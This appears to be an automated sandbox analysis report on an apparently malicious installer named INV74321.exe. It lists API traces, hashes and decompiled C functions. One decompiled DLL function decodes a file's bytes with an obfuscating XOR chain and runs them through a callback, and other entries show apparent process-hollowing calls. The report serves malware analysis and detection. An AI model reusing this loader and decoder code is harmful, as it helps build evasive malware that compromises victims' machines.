                                                          0x0040177c
                                                          0x00401798
                                                          0x0040177e
                                                          0x0040177f
                                                          0x0040177f
                                                          0x0040179e
                                                          0x004017a8
                                                          0x004017a8
                                                          0x004017ac
                                                          0x004017af
                                                          0x004017b4
                                                          0x004017b6
                                                          0x004017b8
                                                          0x004017bd
                                                          0x004017bd
                                                          0x004017c8
                                                          0x004017c8
                                                          0x004017d9
                                                          0x004017db
                                                          0x004017db
                                                          0x004017dc
                                                          0x004017dc
                                                          0x004017df
                                                          0x004017e2
                                                          0x004017e5
                                                          0x004017e5
                                                          0x004017ec
                                                          0x004017fb
                                                          0x00401800
                                                          0x00401803
                                                          0x00401806
                                                          0x00000000
                                                          0x00000000
                                                          0x00401808
                                                          0x0040180b
                                                          0x00401865
                                                          0x0040186a
                                                          0x004015b0
                                                          0x004027bf
                                                          0x004027bf
                                                          0x00402a5a
                                                          0x00402a5d
                                                          0x00402a5d
                                                          0x00000000
                                                          0x0040180d
                                                          0x00401813
                                                          0x0040181e
                                                          0x0040182b
                                                          0x00401836
                                                          0x0040184c
                                                          0x0040184c
                                                          0x0040184f
                                                          0x00000000
                                                          0x00401855
                                                          0x00401855
                                                          0x00401856
                                                          0x00401873
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00402a63
                                                          0x00401858
                                                          0x00401858
                                                          0x00401859
                                                          0x00401492
                                                          0x00402387
                                                          0x00402387
                                                          0x00402387
                                                          0x00401856
                                                          0x0040184f
                                                          0x00402a65
                                                          0x00402a69
                                                          0x00402a69
                                                          0x00401883
                                                          0x00401888
                                                          0x0040188e
                                                          0x0040188f
                                                          0x00401890
                                                          0x00401893
                                                          0x00401896
                                                          0x0040189b
                                                          0x004018a1
                                                          0x004018a5
                                                          0x004018a7
                                                          0x004018af
                                                          0x004018bb
                                                          0x004018a9
                                                          0x004018a9
                                                          0x004018ad
                                                          0x00000000
                                                          0x00000000
                                                          0x004018ad
                                                          0x004018c4
                                                          0x004018ca
                                                          0x004018cc
                                                          0x00000000
                                                          0x004018d2
                                                          0x004018d2
                                                          0x004018d5
                                                          0x004018ed
                                                          0x004018d7
                                                          0x004018da
                                                          0x004018e3
                                                          0x004018e3
                                                          0x004018f2
                                                          0x004018f7
                                                          0x00402382
                                                          0x00000000
                                                          0x00402382
                                                          0x00000000

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,accumulate Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,74B5EA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll$GHFGHFGHFDGDFGDFg
                                                          • API String ID: 1941528284-102923910
                                                          • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                          • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 023F11C3, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 308memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 023F1475
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023F14CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocCreateFileVirtual
                                                          • String ID: 7c29470aad6945a9aae145c599eec3a6
                                                          • API String ID: 1475775534-1095801799
                                                          • Opcode ID: 0b15ef546eea175f4c459f7bae9adaee947352e8bee050cf48af17720ef95cf1
                                                          • Instruction ID: feaa23785904b9fab1fbd7b7b33b8ba442c81be2e162d04d40d06772f6c6de40
                                                          • Opcode Fuzzy Hash: 0b15ef546eea175f4c459f7bae9adaee947352e8bee050cf48af17720ef95cf1
                                                          • Instruction Fuzzy Hash: C4D13930D44388EEEF61DBE4EC05BEDBBB6AF04710F14409AE648BA191D7B50A84DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 023F06F1, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 023F07F3
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 023F09C0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: 1a130295db4accc40e27706ea50130c96f412ff03570a98c8799038c82ee0c03
                                                          • Instruction ID: b4f349155db243ffa6a359e8830f956caf706fef939748d312d1233b7dd47597
                                                          • Opcode Fuzzy Hash: 1a130295db4accc40e27706ea50130c96f412ff03570a98c8799038c82ee0c03
                                                          • Instruction Fuzzy Hash: 3EA10530D00209EFEF54DFE8E985BADBBB2BF08315F204459EA55BA2A1D3755A40DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004030D8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422448
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422448
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                          0x004030e0
                                                          0x004030e4
                                                          0x004030e7
                                                          0x004030ec
                                                          0x004030ee
                                                          0x004030ee
                                                          0x004030f5
                                                          0x004030f9
                                                          0x004030fe
                                                          0x00403100
                                                          0x00403100
                                                          0x00403107
                                                          0x0040310c
                                                          0x00403117
                                                          0x00403117
                                                          0x00403129
                                                          0x004032d8
                                                          0x004032d8
                                                          0x00000000
                                                          0x0040312f
                                                          0x00403133
                                                          0x00403285
                                                          0x004032c8
                                                          0x004032ca
                                                          0x004032ca
                                                          0x004032d6
                                                          0x004032dd
                                                          0x004032e0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004032d6
                                                          0x0040328a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040328c
                                                          0x0040328f
                                                          0x00403292
                                                          0x00403295
                                                          0x00403297
                                                          0x00403297
                                                          0x004032a7
                                                          0x00000000
                                                          0x00000000
                                                          0x004032ae
                                                          0x004032b5
                                                          0x0040327f
                                                          0x0040327f
                                                          0x004032da
                                                          0x004032da
                                                          0x00000000
                                                          0x004032da
                                                          0x004032b7
                                                          0x004032ba
                                                          0x004032c1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004032c3
                                                          0x00000000
                                                          0x0040328f
                                                          0x0040313f
                                                          0x00403141
                                                          0x00403148
                                                          0x0040314f
                                                          0x0040314f
                                                          0x00403156
                                                          0x0040315e
                                                          0x00403168
                                                          0x0040316d
                                                          0x00403175
                                                          0x0040317f
                                                          0x00403182
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403188
                                                          0x00403188
                                                          0x00403188
                                                          0x00403190
                                                          0x00403192
                                                          0x00403192
                                                          0x004031a3
                                                          0x00000000
                                                          0x00000000
                                                          0x004031a9
                                                          0x004031ac
                                                          0x004031b2
                                                          0x004031b8
                                                          0x004031b8
                                                          0x004031c3
                                                          0x004031c9
                                                          0x004031ce
                                                          0x004031d5
                                                          0x004031d8
                                                          0x00000000
                                                          0x00000000
                                                          0x004031de
                                                          0x004031e4
                                                          0x004031e6
                                                          0x004031ef
                                                          0x004031f1
                                                          0x0040321f
                                                          0x00403225
                                                          0x0040322e
                                                          0x00403233
                                                          0x00403233
                                                          0x00403238
                                                          0x00403273
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040323a
                                                          0x0040323e
                                                          0x00403255
                                                          0x0040325a
                                                          0x0040325d
                                                          0x00403260
                                                          0x00403263
                                                          0x00403267
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040326d
                                                          0x00403247
                                                          0x0040324e
                                                          0x00000000
                                                          0x00000000
                                                          0x00403250
                                                          0x00000000
                                                          0x00403250
                                                          0x00403238
                                                          0x0040327b
                                                          0x00000000
                                                          0x0040327b
                                                          0x00000000
                                                          0x00403188

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$H$B
                                                          • API String ID: 551687249-630640294
                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                          0x004056ef
                                                          0x004056f3
                                                          0x004056f6
                                                          0x004056fc
                                                          0x00405700
                                                          0x00405704
                                                          0x0040570c
                                                          0x00405713
                                                          0x00405719
                                                          0x00405720
                                                          0x00405727
                                                          0x0040572f
                                                          0x00405731
                                                          0x00000000
                                                          0x00405731
                                                          0x0040573b
                                                          0x00405742
                                                          0x00405758
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040575a
                                                          0x0040575e

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-3254906087
                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                          0x004064a9
                                                          0x004064b2
                                                          0x004064b4
                                                          0x004064b4
                                                          0x004064b8
                                                          0x004064ca
                                                          0x004064c4
                                                          0x004064c4
                                                          0x004064c4
                                                          0x004064ce
                                                          0x004064e2
                                                          0x004064f6
                                                          0x004064fd

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                          • wsprintfA.USER32 ref: 004064E2
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                          0x00405cc3
                                                          0x00405cc9
                                                          0x00405cca
                                                          0x00405cca
                                                          0x00405ccf
                                                          0x00405cd0
                                                          0x00405cd3
                                                          0x00405cdd
                                                          0x00405cea
                                                          0x00405ced
                                                          0x00405cf5
                                                          0x00000000
                                                          0x00000000
                                                          0x00405cf9
                                                          0x00000000
                                                          0x00000000
                                                          0x00405cfb
                                                          0x00000000
                                                          0x00405cfb
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                          Strings
                                                          • "C:\Users\user\Desktop\INV74321.exe" , xrefs: 00405CBF
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                          • nsa, xrefs: 00405CCA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-4086940424
                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 023F0034, Relevance: 6.5, APIs: 4, Instructions: 546processthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 023F035F
                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 023F0382
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 023F03A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                          • String ID:
                                                          • API String ID: 2411489757-0
                                                          • Opcode ID: 9ab73ef7de48d51c71e97c04d82d2190dffc703efa1e1da09acdc765575b9a47
                                                          • Instruction ID: b2028598306373e0be2737bee1f4949d12694ba32dc0803a9ec04848777198ea
                                                          • Opcode Fuzzy Hash: 9ab73ef7de48d51c71e97c04d82d2190dffc703efa1e1da09acdc765575b9a47
                                                          • Instruction Fuzzy Hash: A8221831E40218EEEF64DBA8ED45BADB7B5FF44705F10409AE608FA2A1D7749A80CF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001120, Relevance: 6.2, APIs: 4, Instructions: 152filememorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E10001120(void* __eflags) {
				signed int _v5;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				short _v572;
				int _t99;

				_v12 = 0;
				_v28 = 0;
				_v16 = E10001000();
				_v40 = E10001070(_v16, 0x8a111d91);
				_v32 = E10001070(_v16, 0xcbec1a0);
				_v36 = E10001070(_v16, 0xa4f84a9a);
				_v52 = E10001070(_v16, 0x433a3842);
				_v44 = E10001070(_v16, 0xa5f15738);
				_v32(0x103,  &_v572);
				_v36( &_v572, 0x10003000);
				_v48 = CreateFileW( &_v572, 0x80000000, 7, 0, 3, 0x80, 0);
				_v24 = 0x1a05;
				_v20 = VirtualAlloc(0, _v24, 0x3000, 0x40);
				ReadFile(_v48, _v20, _v24,  &_v28, 0);
				_v12 = 0;
				while(_v12 < _v28) {
					_v5 =  *((intOrPtr*)(_v20 + _v12));
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000029;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x8a;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x6d;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000003b;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x71;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					 *((char*)(_v20 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				_t99 = EnumTimeFormatsW(_v20, 0, 0); // executed
				return _t99;
			}

















                                                          0x10001129
                                                          0x10001130
                                                          0x1000113c
                                                          0x10001150
                                                          0x10001164
                                                          0x10001178
                                                          0x1000118c
                                                          0x100011a0
                                                          0x100011af
                                                          0x100011be
                                                          0x100011dd
                                                          0x100011e0
                                                          0x100011f7
                                                          0x1000120c
                                                          0x1000120f
                                                          0x10001221
                                                          0x10001235
                                                          0x1000123f
                                                          0x10001249
                                                          0x10001252
                                                          0x1000125c
                                                          0x10001266
                                                          0x10001270
                                                          0x1000127d
                                                          0x10001286
                                                          0x10001290
                                                          0x10001299
                                                          0x100012a3
                                                          0x100012ac
                                                          0x100012b5
                                                          0x100012be
                                                          0x100012c7
                                                          0x100012d1
                                                          0x100012da
                                                          0x100012e4
                                                          0x100012f0
                                                          0x1000121e
                                                          0x1000121e
                                                          0x100012ff
                                                          0x10001308

                                                          APIs
